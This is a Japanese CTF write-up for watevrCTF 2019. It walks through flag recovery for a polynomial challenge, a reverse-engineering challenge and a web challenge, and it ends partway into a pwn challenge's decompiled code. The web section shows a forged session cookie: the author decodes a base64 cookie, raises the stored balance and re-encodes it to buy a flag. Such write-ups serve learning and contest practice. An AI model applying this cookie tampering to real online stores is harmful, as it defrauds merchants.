watevrCTF 2019 Writeup

この大会は2019/12/14 4:00(JST)~2019/12/16 4:00(JST)に開催されました。
今回もチームで参戦。結果は859点で692チーム中43位でした。
自分で解けた問題をWriteupとして書いておきます。

Sanity check (misc)

Discordに入り、#announcementsチャネルのトピックを見ると、フラグが書いてあった。

Here a sanity flag I give to you, it might be useful in a couple hours few: watevr{san1ty_ch3ck}
watevr{san1ty_ch3ck}

Polly (misc)

xの多項式が与えられている。最後にプラスされているのが119。ASCIIコードとして文字にすると、"w"。xを0から順番に最高次数まで順番に代入して多項式を計算すればよさそう。分数を正確に計算できるようsageで実行する。

#!/usr/bin/env sage -python
def calc(x):
    return -510233931851656757*x**56/710998587804863451854045647463724949736497978881168458687447040000000000000 + 28538582555324529581*x**55/25392806707316551851930201695133033919160642102898873524551680000000000000 - 361611288555263491*x**54/421055535502492258043032818391295177534479825940370161664000000000000 + 2189223797409040145903*x**53/5129859940872030677157616504067279579628412546040176469606400000000000 - 3001755643562030554208767*x**52/19357962041026530857198552845536904074069481305811986677760000000000000 + 78238787580756843015401*x**51/1781188998990295441405829301208769237584604463177400320000000000000 - 116104436553238240592813791*x**50/11496527230247656900485565886772482623174748513067073536000000000000 + 127279887341335237997305957*x**49/65694441315700896574203233638699900703855705788954705920000000000 - 20305349569334865003353693141*x**48/64170394447571083344765063383345446352972606387257344000000000000 + 755344461848261566273335985217*x**47/16909766104427515205715118053719408160580619250696192000000000000 - 8730828190255482707329907709523*x**46/1583041933180448232024394030560965870352228185171558400000000000 + 76555149545632714960652198194597*x**45/127331633755818662141092563327729863484853136633364480000000000 - 1602375720398047527703588216319184983*x**44/27479475110939521552978869398000199787640242135105536000000000000 + 114295162137526589722365996075069211717*x**43/22572425983986035561375499862643021254133056039550976000000000000 - 13848681865733026134505571948717935637*x**42/34996009277497729552520154825803133727338071379148800000000000 + 153346974308020314565759178978111441*x**41/5485267911833499929862093232884503719018506485760000000000 - 520024520896904430645934556087134499251423*x**40/290210808642664098728215918067635743104754738266112000000000000 + 583372437848702106759949552819801879184581*x**39/5580977089282001898619536885916071982783744966656000000000000 - 46031013908208473758789005123614987736509587*x**38/8272977802935673402659548795593236115655904303513600000000000 + 7353657867840940108498978410191786786833213*x**37/27150699353263793020311260526078188024353353891840000000000 - 92499773752352276492046888338669680452103462189*x**36/7657889561176967262139073481714360724817612636160000000000000 + 4100551582505375935469899571343423946185109603489*x**35/8296047024608381200650662938523890785219080355840000000000000 - 1895954357110172205089772212408286791708615900917*x**34/102036942013899875729927939885587961529432539136000000000000 + 43118050173835025743884479345094473671998423653*x**33/67129567114407812980215749924728922058837196800000000000 - 22765966699209423168314620580071311613337850078228970157*x**32/1114243406791786642970813103550620539901403327365120000000000000 + 2164682230392596021581197470695955891436192181935306391*x**31/3617673398674631957697445141398118636043517296640000000000000 - 920699702649221064972928655611480860602416008467275417*x**30/57052913814223586429637127677963161285274107904000000000000 + 686056125302514633652788467458025065050820545750401507*x**29/1711587414426707592889113830338894838558223237120000000000 - 3138304869574821781724911760498738183508227936479448972609*x**28/342317482885341518577822766067778967711644647424000000000000 + 1270675513242488953141124524513884117237971552020405481903*x**27/6583028517025798434188899347457287840608550912000000000000 - 35251878159156858646651490873547468067999378927697697003224477*x**26/9428213442084348517445341645428327645319566616166400000000000 + 640581045258286772319400657438117285194045922802459043053203*x**25/9620625961310559711678920046355436372775067975680000000000 - 72656459972106788902891971241582058202821865848124369081172639*x**24/66716462086011457208029806848269051769244352512000000000000 + 154039473157326645352130477125406816808322554770621702623189519*x**23/9427326164327705909830298793777148619567136768000000000000 - 1082910009287427089558040173029448590098449209287440350613671*x**22/4822161720883737038276367669451226915379609600000000000 + 24188920823778246702349239533423129779289240972762319245699197*x**21/8570296513025187190754817085251953290515578880000000000 - 2312064026649698678901994207690698059469649821996032406197587664228741*x**20/71419066189405618046396886086957233654685736370176000000000000 + 862370556128011088565191676373092759230061876592574879284609935706793*x**19/2550680935335914930228460217391329773381633441792000000000000 - 32072107483702086982352528206453150709858865925578274033380368180437*x**18/10002670334650646785209647911338548130908366438400000000000 + 1529698138827681013559573339316154298621053459717691815776842419379*x**17/55570390748059148806720266174103045171713146880000000000 - 222611348623707141383036923098732823232255364898093370342989110678452081*x**16/1044260259473944837992951668521686390518442885120000000000000 + 19351471406694225111369749822067705924291211128650839886054241035573*x**15/13048686203253171864759230125976987935703040000000000000 - 788448884149338619773551061237815179858025448137798058040565357883017969*x**14/85480045326791055697402842485438742223090876416000000000000 + 1073836757430890424151052096696872926581023064319957457780403520628397*x**13/21054198356352476772759320809221365079579033600000000000 - 13037261936583491232564987358021148191312145269662640728042654537466177*x**12/52337322240932848864901859644270462537564160000000000000 + 193553176960028089077524490434690010049391798907017144709511622501501*x**11/181523857324358216783809467780676473323520000000000000 - 68187858129806282947338026458215966993811977794098721136854363544114709*x**10/17205436276727086314158740721145118396514304000000000000 + 8945934592679151193925448392874011400632217576523903097012117504044751*x**9/707334602487669104026526007424854867412254720000000000 - 1869710221567968463761175994053678221652715546983576126590166640405599343*x**8/54712331502421205196451786674312523994337902592000000000 + 150097834583670559919903774847355537654811358204762610127392287652832711*x**7/1954011839372185899873278095511161571226353664000000000 - 887795495236087230655513134787312551397755543548982957604351894153*x**6/6324332742830674887191952972548659841433600000000 + 325850556958534026053020666873255701298636569528110069255986051*x**5/1611756757211697568252622935684799553945600000 - 1383255113415521659958099444243664043564187251342510179583421*x**4/6303358038091792437823864786842855398400000 + 1288933044552801369576288324542563196552750611910520778643*x**3/7696407860917939484522423427158553600000 - 58143815812249254268696937296354052881595701176023*x**2/732857216672564586715802770080000 + 76949958412245985708257714245417562997*x/4439171857433454741600 + 119

flag = ''
for i in range(57):
    code = calc(i)
    flag += chr(code)

print flag
watevr{polly_polynomials_youtube.com/watch?v=THNWVVn9JO0}

Cookie Store (web)

手持ちは$50。$100のFlag Cookieは買えない。$1のChocolate Chip Cookieを買ってみる。
cookieのsessionには以下が設定されている。

eyJtb25leSI6IDQ5LCAiaGlzdG9yeSI6IFsiWXVtbXkgY2hvY29sYXRlIGNoaXAgY29va2llIl19
$ echo eyJtb25leSI6IDQ5LCAiaGlzdG9yeSI6IFsiWXVtbXkgY2hvY29sYXRlIGNoaXAgY29va2llIl19 | base64 -d
{"money": 49, "history": ["Yummy chocolate chip cookie"]}

moneyを100にして、Base64エンコードする。

$ echo -n '{"money": 100, "history": ["Yummy chocolate chip cookie"]}' | base64
eyJtb25leSI6IDEwMCwgImhpc3RvcnkiOiBbIll1bW15IGNob2NvbGF0ZSBjaGlwIGNvb2tpZSJd
fQ==

以下をcookieのsessionに設定してみる。

eyJtb25leSI6IDEwMCwgImhpc3RvcnkiOiBbIll1bW15IGNob2NvbGF0ZSBjaGlwIGNvb2tpZSJdfQ==

手持ちは$100になった。Flag Cookieを買ってみる。
cookieのsessionには以下が設定される。

eyJtb25leSI6IDAsICJoaXN0b3J5IjogWyJZdW1teSBjaG9jb2xhdGUgY2hpcCBjb29raWUiLCAid2F0ZXZye2I2NF8xNV80XzZyMzQ3XzNuY3J5cDcxMG5fbTM3aDBkfVxuIl19
$ echo eyJtb25leSI6IDAsICJoaXN0b3J5IjogWyJZdW1teSBjaG9jb2xhdGUgY2hpcCBjb29raWUiLCAid2F0ZXZye2I2NF8xNV80XzZyMzQ3XzNuY3J5cDcxMG5fbTM3aDBkfVxuIl19 | base64 -d
{"money": 0, "history": ["Yummy chocolate chip cookie", "watevr{b64_15_4_6r347_3ncryp710n_m37h0d}\n"]}
watevr{b64_15_4_6r347_3ncryp710n_m37h0d}

Timeout (reverse)

$ gdb -q timeout
Reading symbols from timeout...(no debugging symbols found)...done.
gdb-peda$ i func
All defined functions:

Non-debugging symbols:
0x0000000000400508  _init
0x0000000000400530  puts@plt
0x0000000000400540  clock@plt
0x0000000000400550  __stack_chk_fail@plt
0x0000000000400560  alarm@plt
0x0000000000400570  signal@plt
0x0000000000400580  exit@plt
0x0000000000400590  _start
0x00000000004005c0  _dl_relocate_static_pie
0x00000000004005d0  deregister_tm_clones
0x0000000000400600  register_tm_clones
0x0000000000400640  __do_global_dtors_aux
0x0000000000400670  frame_dummy
0x0000000000400677  delay
0x00000000004006a6  generate
0x0000000000400ad7  sig
0x0000000000400aec  main
0x0000000000400b30  __libc_csu_init
0x0000000000400ba0  __libc_csu_fini
0x0000000000400ba4  _fini
gdb-peda$ disas generate
Dump of assembler code for function generate:
   0x00000000004006a6 <+0>:	push   rbp
   0x00000000004006a7 <+1>:	mov    rbp,rsp
   0x00000000004006aa <+4>:	sub    rsp,0xb0
   0x00000000004006b1 <+11>:	mov    rax,QWORD PTR fs:0x28
   0x00000000004006ba <+20>:	mov    QWORD PTR [rbp-0x8],rax
   0x00000000004006be <+24>:	xor    eax,eax
   0x00000000004006c0 <+26>:	mov    eax,DWORD PTR [rip+0x200996]        # 0x60105c <can_continue>
   0x00000000004006c6 <+32>:	cmp    eax,0x539
   0x00000000004006cb <+37>:	jne    0x400ac0 <generate+1050>
   0x00000000004006d1 <+43>:	mov    BYTE PTR [rbp-0x70],0x23
   0x00000000004006d5 <+47>:	mov    BYTE PTR [rbp-0x6f],0x3c
   0x00000000004006d9 <+51>:	mov    BYTE PTR [rbp-0x6e],0x49
   0x00000000004006dd <+55>:	mov    BYTE PTR [rbp-0x6d],0x64
   0x00000000004006e1 <+59>:	mov    BYTE PTR [rbp-0x6c],0x55
   0x00000000004006e5 <+63>:	mov    BYTE PTR [rbp-0x6b],0x2e
   0x00000000004006e9 <+67>:	mov    BYTE PTR [rbp-0x6a],0x77
   0x00000000004006ed <+71>:	mov    BYTE PTR [rbp-0x69],0x20
   0x00000000004006f1 <+75>:	mov    BYTE PTR [rbp-0x68],0x2d
   0x00000000004006f5 <+79>:	mov    BYTE PTR [rbp-0x67],0x73
   0x00000000004006f9 <+83>:	mov    BYTE PTR [rbp-0x66],0x3f
   0x00000000004006fd <+87>:	mov    BYTE PTR [rbp-0x65],0x7d
   0x0000000000400701 <+91>:	mov    BYTE PTR [rbp-0x64],0x2c
   0x0000000000400705 <+95>:	mov    BYTE PTR [rbp-0x63],0x38
   0x0000000000400709 <+99>:	mov    BYTE PTR [rbp-0x62],0x6c
   0x000000000040070d <+103>:	mov    BYTE PTR [rbp-0x61],0x53
   0x0000000000400711 <+107>:	mov    BYTE PTR [rbp-0x60],0x54
   0x0000000000400715 <+111>:	mov    BYTE PTR [rbp-0x5f],0x2a
   0x0000000000400719 <+115>:	mov    BYTE PTR [rbp-0x5e],0x5a
   0x000000000040071d <+119>:	mov    BYTE PTR [rbp-0x5d],0x6a
   0x0000000000400721 <+123>:	mov    BYTE PTR [rbp-0x5c],0x57
   0x0000000000400725 <+127>:	mov    BYTE PTR [rbp-0x5b],0x3a
   0x0000000000400729 <+131>:	mov    BYTE PTR [rbp-0x5a],0x66
   0x000000000040072d <+135>:	mov    BYTE PTR [rbp-0x59],0x5e
   0x0000000000400731 <+139>:	mov    BYTE PTR [rbp-0x58],0x4d
   0x0000000000400735 <+143>:	mov    BYTE PTR [rbp-0x57],0x36
   0x0000000000400739 <+147>:	mov    BYTE PTR [rbp-0x56],0x65
   0x000000000040073d <+151>:	mov    BYTE PTR [rbp-0x55],0x6e
   0x0000000000400741 <+155>:	mov    BYTE PTR [rbp-0x54],0x70
   0x0000000000400745 <+159>:	mov    BYTE PTR [rbp-0x53],0x68
   0x0000000000400749 <+163>:	mov    BYTE PTR [rbp-0x52],0x63
   0x000000000040074d <+167>:	mov    BYTE PTR [rbp-0x51],0x2f
   0x0000000000400751 <+171>:	mov    BYTE PTR [rbp-0x50],0x4f
   0x0000000000400755 <+175>:	mov    BYTE PTR [rbp-0x4f],0x76
   0x0000000000400759 <+179>:	mov    BYTE PTR [rbp-0x4e],0x25
   0x000000000040075d <+183>:	mov    BYTE PTR [rbp-0x4d],0x4b
   0x0000000000400761 <+187>:	mov    BYTE PTR [rbp-0x4c],0xb
   0x0000000000400765 <+191>:	mov    BYTE PTR [rbp-0x4b],0x34
   0x0000000000400769 <+195>:	mov    BYTE PTR [rbp-0x4a],0x4c
   0x000000000040076d <+199>:	mov    BYTE PTR [rbp-0x49],0x52
   0x0000000000400771 <+203>:	mov    BYTE PTR [rbp-0x48],0x67
   0x0000000000400775 <+207>:	mov    BYTE PTR [rbp-0x47],0x60
   0x0000000000400779 <+211>:	mov    BYTE PTR [rbp-0x46],0x5f
   0x000000000040077d <+215>:	mov    BYTE PTR [rbp-0x45],0x45
   0x0000000000400781 <+219>:	mov    BYTE PTR [rbp-0x44],0x7b
   0x0000000000400785 <+223>:	mov    BYTE PTR [rbp-0x43],0x72
   0x0000000000400789 <+227>:	mov    BYTE PTR [rbp-0x42],0x3b
   0x000000000040078d <+231>:	mov    BYTE PTR [rbp-0x41],0x7e
   0x0000000000400791 <+235>:	mov    BYTE PTR [rbp-0x40],0x4a
   0x0000000000400795 <+239>:	mov    BYTE PTR [rbp-0x3f],0xa
   0x0000000000400799 <+243>:	mov    BYTE PTR [rbp-0x3e],0x6b
   0x000000000040079d <+247>:	mov    BYTE PTR [rbp-0x3d],0x71
   0x00000000004007a1 <+251>:	mov    BYTE PTR [rbp-0x3c],0x43
   0x00000000004007a5 <+255>:	mov    BYTE PTR [rbp-0x3b],0x24
   0x00000000004007a9 <+259>:	mov    BYTE PTR [rbp-0x3a],0x5c
   0x00000000004007ad <+263>:	mov    BYTE PTR [rbp-0x39],0x28
   0x00000000004007b1 <+267>:	mov    BYTE PTR [rbp-0x38],0x22
   0x00000000004007b5 <+271>:	mov    BYTE PTR [rbp-0x37],0x40
   0x00000000004007b9 <+275>:	mov    BYTE PTR [rbp-0x36],0x32
   0x00000000004007bd <+279>:	mov    BYTE PTR [rbp-0x35],0x44
   0x00000000004007c1 <+283>:	mov    BYTE PTR [rbp-0x34],0x62
   0x00000000004007c5 <+287>:	mov    BYTE PTR [rbp-0x33],0x50
   0x00000000004007c9 <+291>:	mov    BYTE PTR [rbp-0x32],0xd
   0x00000000004007cd <+295>:	mov    BYTE PTR [rbp-0x31],0x26
   0x00000000004007d1 <+299>:	mov    BYTE PTR [rbp-0x30],0x31
   0x00000000004007d5 <+303>:	mov    BYTE PTR [rbp-0x2f],0x37
   0x00000000004007d9 <+307>:	mov    BYTE PTR [rbp-0x2e],0xc
   0x00000000004007dd <+311>:	mov    BYTE PTR [rbp-0x2d],0x5d
   0x00000000004007e1 <+315>:	mov    BYTE PTR [rbp-0x2c],0x79
   0x00000000004007e5 <+319>:	mov    BYTE PTR [rbp-0x2b],0x3e
   0x00000000004007e9 <+323>:	mov    BYTE PTR [rbp-0x2a],0x3d
   0x00000000004007ed <+327>:	mov    BYTE PTR [rbp-0x29],0x78
   0x00000000004007f1 <+331>:	mov    BYTE PTR [rbp-0x28],0x61
   0x00000000004007f5 <+335>:	mov    BYTE PTR [rbp-0x27],0x56
   0x00000000004007f9 <+339>:	mov    BYTE PTR [rbp-0x26],0x59
   0x00000000004007fd <+343>:	mov    BYTE PTR [rbp-0x25],0x41
   0x0000000000400801 <+347>:	mov    BYTE PTR [rbp-0x24],0x5b
   0x0000000000400805 <+351>:	mov    BYTE PTR [rbp-0x23],0x42
   0x0000000000400809 <+355>:	mov    BYTE PTR [rbp-0x22],0x46
   0x000000000040080d <+359>:	mov    BYTE PTR [rbp-0x21],0x33
   0x0000000000400811 <+363>:	lea    rax,[rip+0x39c]        # 0x400bb4
   0x0000000000400818 <+370>:	mov    BYTE PTR [rbp-0x20],al
   0x000000000040081b <+373>:	mov    BYTE PTR [rbp-0x1f],0x21
   0x000000000040081f <+377>:	mov    BYTE PTR [rbp-0x1e],0x74
   0x0000000000400823 <+381>:	mov    BYTE PTR [rbp-0x1d],0x51
   0x0000000000400827 <+385>:	mov    BYTE PTR [rbp-0x1c],0x48
   0x000000000040082b <+389>:	mov    BYTE PTR [rbp-0x1b],0x75
   0x000000000040082f <+393>:	mov    BYTE PTR [rbp-0x1a],0x30
   0x0000000000400833 <+397>:	mov    BYTE PTR [rbp-0x19],0x58
   0x0000000000400837 <+401>:	mov    BYTE PTR [rbp-0x18],0x69
   0x000000000040083b <+405>:	mov    BYTE PTR [rbp-0x17],0x35
   0x000000000040083f <+409>:	mov    BYTE PTR [rbp-0x16],0x7c
   0x0000000000400843 <+413>:	mov    BYTE PTR [rbp-0x15],0x9
   0x0000000000400847 <+417>:	mov    BYTE PTR [rbp-0x14],0x39
   0x000000000040084b <+421>:	mov    BYTE PTR [rbp-0x13],0x4e
   0x000000000040084f <+425>:	mov    BYTE PTR [rbp-0x12],0x2b
   0x0000000000400853 <+429>:	mov    BYTE PTR [rbp-0x11],0x7a
   0x0000000000400857 <+433>:	mov    BYTE PTR [rbp-0x10],0x6d
   0x000000000040085b <+437>:	mov    BYTE PTR [rbp-0xf],0x47
   0x000000000040085f <+441>:	mov    BYTE PTR [rbp-0xe],0x29
   0x0000000000400863 <+445>:	mov    BYTE PTR [rbp-0xd],0x6f
   0x0000000000400867 <+449>:	mov    BYTE PTR [rbp-0xc],0x0
   0x000000000040086b <+453>:	movzx  eax,BYTE PTR [rbp-0x6a]
   0x000000000040086f <+457>:	mov    BYTE PTR [rbp-0xb0],al
   0x0000000000400875 <+463>:	movzx  eax,BYTE PTR [rbp-0x28]
   0x0000000000400879 <+467>:	mov    BYTE PTR [rbp-0xaf],al
   0x000000000040087f <+473>:	movzx  eax,BYTE PTR [rbp-0x1e]
   0x0000000000400883 <+477>:	mov    BYTE PTR [rbp-0xae],al
   0x0000000000400889 <+483>:	movzx  eax,BYTE PTR [rbp-0x56]
   0x000000000040088d <+487>:	mov    BYTE PTR [rbp-0xad],al
   0x0000000000400893 <+493>:	movzx  eax,BYTE PTR [rbp-0x4f]
   0x0000000000400897 <+497>:	mov    BYTE PTR [rbp-0xac],al
   0x000000000040089d <+503>:	movzx  eax,BYTE PTR [rbp-0x43]
   0x00000000004008a1 <+507>:	mov    BYTE PTR [rbp-0xab],al
   0x00000000004008a7 <+513>:	movzx  eax,BYTE PTR [rbp-0x44]
   0x00000000004008ab <+517>:	mov    BYTE PTR [rbp-0xaa],al
   0x00000000004008b1 <+523>:	movzx  eax,BYTE PTR [rbp-0x21]
   0x00000000004008b5 <+527>:	mov    BYTE PTR [rbp-0xa9],al
   0x00000000004008bb <+533>:	movzx  eax,BYTE PTR [rbp-0x55]
   0x00000000004008bf <+537>:	mov    BYTE PTR [rbp-0xa8],al
   0x00000000004008c5 <+543>:	movzx  eax,BYTE PTR [rbp-0x52]
   0x00000000004008c9 <+547>:	mov    BYTE PTR [rbp-0xa7],al
   0x00000000004008cf <+553>:	movzx  eax,BYTE PTR [rbp-0x43]
   0x00000000004008d3 <+557>:	mov    BYTE PTR [rbp-0xa6],al
   0x00000000004008d9 <+563>:	movzx  eax,BYTE PTR [rbp-0x2c]
   0x00000000004008dd <+567>:	mov    BYTE PTR [rbp-0xa5],al
   0x00000000004008e3 <+573>:	movzx  eax,BYTE PTR [rbp-0x1e]
   0x00000000004008e7 <+577>:	mov    BYTE PTR [rbp-0xa4],al
   0x00000000004008ed <+583>:	movzx  eax,BYTE PTR [rbp-0x18]
   0x00000000004008f1 <+587>:	mov    BYTE PTR [rbp-0xa3],al
   0x00000000004008f7 <+593>:	movzx  eax,BYTE PTR [rbp-0xd]
   0x00000000004008fb <+597>:	mov    BYTE PTR [rbp-0xa2],al
   0x0000000000400901 <+603>:	movzx  eax,BYTE PTR [rbp-0x55]
   0x0000000000400905 <+607>:	mov    BYTE PTR [rbp-0xa1],al
   0x000000000040090b <+613>:	movzx  eax,BYTE PTR [rbp-0x46]
   0x000000000040090f <+617>:	mov    BYTE PTR [rbp-0xa0],al
   0x0000000000400915 <+623>:	movzx  eax,BYTE PTR [rbp-0x18]
   0x0000000000400919 <+627>:	mov    BYTE PTR [rbp-0x9f],al
   0x000000000040091f <+633>:	movzx  eax,BYTE PTR [rbp-0x67]
   0x0000000000400923 <+637>:	mov    BYTE PTR [rbp-0x9e],al
   0x0000000000400929 <+643>:	movzx  eax,BYTE PTR [rbp-0x46]
   0x000000000040092d <+647>:	mov    BYTE PTR [rbp-0x9d],al
   0x0000000000400933 <+653>:	movzx  eax,BYTE PTR [rbp-0xd]
   0x0000000000400937 <+657>:	mov    BYTE PTR [rbp-0x9c],al
   0x000000000040093d <+663>:	movzx  eax,BYTE PTR [rbp-0x4f]
   0x0000000000400941 <+667>:	mov    BYTE PTR [rbp-0x9b],al
   0x0000000000400947 <+673>:	movzx  eax,BYTE PTR [rbp-0x56]
   0x000000000040094b <+677>:	mov    BYTE PTR [rbp-0x9a],al
   0x0000000000400951 <+683>:	movzx  eax,BYTE PTR [rbp-0x43]
   0x0000000000400955 <+687>:	mov    BYTE PTR [rbp-0x99],al
   0x000000000040095b <+693>:	movzx  eax,BYTE PTR [rbp-0x43]
   0x000000000040095f <+697>:	mov    BYTE PTR [rbp-0x98],al
   0x0000000000400965 <+703>:	movzx  eax,BYTE PTR [rbp-0x28]
   0x0000000000400969 <+707>:	mov    BYTE PTR [rbp-0x97],al
   0x000000000040096f <+713>:	movzx  eax,BYTE PTR [rbp-0x1e]
   0x0000000000400973 <+717>:	mov    BYTE PTR [rbp-0x96],al
   0x0000000000400979 <+723>:	movzx  eax,BYTE PTR [rbp-0x56]
   0x000000000040097d <+727>:	mov    BYTE PTR [rbp-0x95],al
   0x0000000000400983 <+733>:	movzx  eax,BYTE PTR [rbp-0x6d]
   0x0000000000400987 <+737>:	mov    BYTE PTR [rbp-0x94],al
   0x000000000040098d <+743>:	movzx  eax,BYTE PTR [rbp-0x46]
   0x0000000000400991 <+747>:	mov    BYTE PTR [rbp-0x93],al
   0x0000000000400997 <+753>:	movzx  eax,BYTE PTR [rbp-0x2c]
   0x000000000040099b <+757>:	mov    BYTE PTR [rbp-0x92],al
   0x00000000004009a1 <+763>:	movzx  eax,BYTE PTR [rbp-0xd]
   0x00000000004009a5 <+767>:	mov    BYTE PTR [rbp-0x91],al
   0x00000000004009ab <+773>:	movzx  eax,BYTE PTR [rbp-0x1b]
   0x00000000004009af <+777>:	mov    BYTE PTR [rbp-0x90],al
   0x00000000004009b5 <+783>:	movzx  eax,BYTE PTR [rbp-0x1e]
   0x00000000004009b9 <+787>:	mov    BYTE PTR [rbp-0x8f],al
   0x00000000004009bf <+793>:	movzx  eax,BYTE PTR [rbp-0x1b]
   0x00000000004009c3 <+797>:	mov    BYTE PTR [rbp-0x8e],al
   0x00000000004009c9 <+803>:	movzx  eax,BYTE PTR [rbp-0x34]
   0x00000000004009cd <+807>:	mov    BYTE PTR [rbp-0x8d],al
   0x00000000004009d3 <+813>:	movzx  eax,BYTE PTR [rbp-0x56]
   0x00000000004009d7 <+817>:	mov    BYTE PTR [rbp-0x8c],al
   0x00000000004009dd <+823>:	movzx  eax,BYTE PTR [rbp-0x6b]
   0x00000000004009e1 <+827>:	mov    BYTE PTR [rbp-0x8b],al
   0x00000000004009e7 <+833>:	movzx  eax,BYTE PTR [rbp-0x52]
   0x00000000004009eb <+837>:	mov    BYTE PTR [rbp-0x8a],al
   0x00000000004009f1 <+843>:	movzx  eax,BYTE PTR [rbp-0xd]
   0x00000000004009f5 <+847>:	mov    BYTE PTR [rbp-0x89],al
   0x00000000004009fb <+853>:	movzx  eax,BYTE PTR [rbp-0x10]
   0x00000000004009ff <+857>:	mov    BYTE PTR [rbp-0x88],al
   0x0000000000400a05 <+863>:	movzx  eax,BYTE PTR [rbp-0x51]
   0x0000000000400a09 <+867>:	mov    BYTE PTR [rbp-0x87],al
   0x0000000000400a0f <+873>:	movzx  eax,BYTE PTR [rbp-0x6a]
   0x0000000000400a13 <+877>:	mov    BYTE PTR [rbp-0x86],al
   0x0000000000400a19 <+883>:	movzx  eax,BYTE PTR [rbp-0x28]
   0x0000000000400a1d <+887>:	mov    BYTE PTR [rbp-0x85],al
   0x0000000000400a23 <+893>:	movzx  eax,BYTE PTR [rbp-0x1e]
   0x0000000000400a27 <+897>:	mov    BYTE PTR [rbp-0x84],al
   0x0000000000400a2d <+903>:	movzx  eax,BYTE PTR [rbp-0x52]
   0x0000000000400a31 <+907>:	mov    BYTE PTR [rbp-0x83],al
   0x0000000000400a37 <+913>:	movzx  eax,BYTE PTR [rbp-0x53]
   0x0000000000400a3b <+917>:	mov    BYTE PTR [rbp-0x82],al
   0x0000000000400a41 <+923>:	movzx  eax,BYTE PTR [rbp-0x66]
   0x0000000000400a45 <+927>:	mov    BYTE PTR [rbp-0x81],al
   0x0000000000400a4b <+933>:	movzx  eax,BYTE PTR [rbp-0x4f]
   0x0000000000400a4f <+937>:	mov    BYTE PTR [rbp-0x80],al
   0x0000000000400a52 <+940>:	movzx  eax,BYTE PTR [rbp-0x2a]
   0x0000000000400a56 <+944>:	mov    BYTE PTR [rbp-0x7f],al
   0x0000000000400a59 <+947>:	movzx  eax,BYTE PTR [rbp-0x50]
   0x0000000000400a5d <+951>:	mov    BYTE PTR [rbp-0x7e],al
   0x0000000000400a60 <+954>:	movzx  eax,BYTE PTR [rbp-0x33]
   0x0000000000400a64 <+958>:	mov    BYTE PTR [rbp-0x7d],al
   0x0000000000400a67 <+961>:	movzx  eax,BYTE PTR [rbp-0x5a]
   0x0000000000400a6b <+965>:	mov    BYTE PTR [rbp-0x7c],al
   0x0000000000400a6e <+968>:	movzx  eax,BYTE PTR [rbp-0x1a]
   0x0000000000400a72 <+972>:	mov    BYTE PTR [rbp-0x7b],al
   0x0000000000400a75 <+975>:	movzx  eax,BYTE PTR [rbp-0x26]
   0x0000000000400a79 <+979>:	mov    BYTE PTR [rbp-0x7a],al
   0x0000000000400a7c <+982>:	movzx  eax,BYTE PTR [rbp-0x34]
   0x0000000000400a80 <+986>:	mov    BYTE PTR [rbp-0x79],al
   0x0000000000400a83 <+989>:	movzx  eax,BYTE PTR [rbp-0x19]
   0x0000000000400a87 <+993>:	mov    BYTE PTR [rbp-0x78],al
   0x0000000000400a8a <+996>:	movzx  eax,BYTE PTR [rbp-0x3d]
   0x0000000000400a8e <+1000>:	mov    BYTE PTR [rbp-0x77],al
   0x0000000000400a91 <+1003>:	movzx  eax,BYTE PTR [rbp-0x35]
   0x0000000000400a95 <+1007>:	mov    BYTE PTR [rbp-0x76],al
   0x0000000000400a98 <+1010>:	movzx  eax,BYTE PTR [rbp-0x10]
   0x0000000000400a9c <+1014>:	mov    BYTE PTR [rbp-0x75],al
   0x0000000000400a9f <+1017>:	movzx  eax,BYTE PTR [rbp-0x1a]
   0x0000000000400aa3 <+1021>:	mov    BYTE PTR [rbp-0x74],al
   0x0000000000400aa6 <+1024>:	movzx  eax,BYTE PTR [rbp-0x65]
   0x0000000000400aaa <+1028>:	mov    BYTE PTR [rbp-0x73],al
   0x0000000000400aad <+1031>:	mov    BYTE PTR [rbp-0x72],0x0
   0x0000000000400ab1 <+1035>:	lea    rax,[rbp-0xb0]
   0x0000000000400ab8 <+1042>:	mov    rdi,rax
   0x0000000000400abb <+1045>:	call   0x400530 <puts@plt>
   0x0000000000400ac0 <+1050>:	nop
   0x0000000000400ac1 <+1051>:	mov    rax,QWORD PTR [rbp-0x8]
   0x0000000000400ac5 <+1055>:	xor    rax,QWORD PTR fs:0x28
   0x0000000000400ace <+1064>:	je     0x400ad5 <generate+1071>
   0x0000000000400ad0 <+1066>:	call   0x400550 <__stack_chk_fail@plt>
   0x0000000000400ad5 <+1071>:	leave  
   0x0000000000400ad6 <+1072>:	ret    
End of assembler dump.

この情報を元にフラグを組み立てる。

vals = [0x23, 0x3c, 0x49, 0x64, 0x55, 0x2e, 0x77, 0x20, 0x2d, 0x73, 0x3f,
    0x7d, 0x2c, 0x38, 0x6c, 0x53, 0x54, 0x2a, 0x5a, 0x6a, 0x57, 0x3a, 0x66,
    0x5e, 0x4d, 0x36, 0x65, 0x6e, 0x70, 0x68, 0x63, 0x2f, 0x4f, 0x76, 0x25,
    0x4b, 0xb, 0x34, 0x4c, 0x52, 0x67, 0x60, 0x5f, 0x45, 0x7b, 0x72, 0x3b,
    0x7e, 0x4a, 0xa, 0x6b, 0x71, 0x43, 0x24, 0x5c, 0x28, 0x22, 0x40, 0x32,
    0x44, 0x62, 0x50, 0xd, 0x26, 0x31, 0x37, 0xc, 0x5d, 0x79, 0x3e, 0x3d,
    0x78, 0x61, 0x56, 0x59, 0x41, 0x5b, 0x42, 0x46, 0x33, 0, 0x21, 0x74,
    0x51, 0x48, 0x75, 0x30, 0x58, 0x69, 0x35, 0x7c, 0x9, 0x39, 0x4e, 0x2b,
    0x7a, 0x6d, 0x47, 0x29, 0x6f]

adrs_list = [0x6a, 0x28, 0x1e, 0x56, 0x4f, 0x43, 0x44, 0x21, 0x55, 0x52,
    0x43, 0x2c, 0x1e, 0x18, 0xd, 0x55, 0x46, 0x18, 0x67, 0x46, 0xd, 0x4f,
    0x56, 0x43, 0x43, 0x28, 0x1e, 0x56, 0x6d, 0x46, 0x2c, 0xd, 0x1b, 0x1e,
    0x1b, 0x34, 0x56, 0x6b, 0x52, 0xd, 0x10, 0x51, 0x6a, 0x28, 0x1e, 0x52,
    0x53, 0x66, 0x4f, 0x2a, 0x50, 0x33, 0x5a, 0x1a, 0x26, 0x34, 0x19, 0x3d,
    0x35, 0x10, 0x1a, 0x65]

flag = ''
for adrs in adrs_list:
    flag += chr(vals[0x70 - adrs])
print flag
watevr{3ncrytion_is_overrated_youtube.com/watch?v=OPf0YbXqDm0}

Voting Machine 1 (pwn)

Ghidraでデコンパイルする。

undefined8 main(void)

{
  char local_a [2];
  
  signal(0xe,sig);
  alarm(0x28);
  puts("Hello and welcome to \x1b[3mour\x1b[23m voting application!");
  puts("Today\'s vote will be regarding the administration of");
  puts("watevr CTF.");
